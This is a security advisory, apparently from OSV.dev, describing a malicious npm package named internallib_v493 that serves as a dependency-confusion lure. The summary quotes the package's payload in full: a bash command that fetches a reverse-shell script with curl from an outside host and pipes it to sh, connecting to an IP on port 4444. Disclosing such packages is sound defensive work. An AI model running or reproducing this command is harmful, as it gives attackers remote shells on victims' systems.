internallib_v493 @1.0.4
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 4:30 AM UTC
OSV ID
MAL-2026-4585
Ecosystem
npm
Summary
The package's sole exported function command() in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh" , fetching a reverse-shell script from reverse-shell.sh and piping it directly to sh to establish a connection back to 10.0.74.90 on port 4444. The package has no other functionality — its only advertised export is the backdoor. The package name ( internallib_v493 ) and placeholder metadata (empty author, generic description) are consistent with a dependency-confusion / internal-name-squatting lure targeting organizations with private packages of similar names. A typo in the source ( reuquire instead of require ) means the payload throws on load in its current form, but the malicious intent is unambiguous and a corrected republish would fire immediately on any caller invoking the export.
Source: amazon-inspector (67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.